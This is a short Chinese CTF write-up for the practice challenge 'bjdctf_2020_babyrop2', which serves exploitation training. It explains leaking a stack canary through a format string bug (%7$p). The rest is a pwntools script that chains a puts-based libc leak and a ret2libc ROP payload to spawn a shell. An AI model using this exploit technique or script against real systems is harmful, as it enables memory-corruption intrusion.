格式化字符串漏洞+金丝雀绕过。
出现这种形式的,v2就是canary。
查看他在栈里的位置。
var_8就是canary。
利用格式化字符串漏洞。
%6$p表示输出第六个参数。
发现我们输入的东西在第六个参数的位置。
调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。
于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。
代码如下:
from pwn import *
from LibcSearcher import *
#r=remote('node4.buuoj.cn','25605')
r=process('bjdctf_2020_babyrop2')
elf=ELF('bjdctf_2020_babyrop2')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']
puts_got=elf.got['puts']
puts_libc=libc.sym['puts']
vuln=elf.sym['vuln']
puts_plt=elf.plt['puts']
pop_rdi=0x0000000000400993
system_libc=libc.sym['system']
bin_sh=0x000000000018CD57
payload='%7$p'
r.recvuntil("I'll give u some gift to help u!\n")
r.sendline(payload)
gdb.attach(r)
pause()
r.recvuntil('0x')
canary=int(r.recv(16),16)
print(hex(canary))
r.recvuntil("Pull up your sword and tell me u story!\n")
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
r.sendline(payload)
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
print (hex(puts_addr))
offset=puts_addr-puts_libc
system_addr=offset+system_libc
binsh=offset+bin_sh
r.recvuntil('Pull up your sword and tell me u story!\n')
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(binsh)+p64(system_addr)+p64(vuln)
r.sendline(payload)
r.interactive()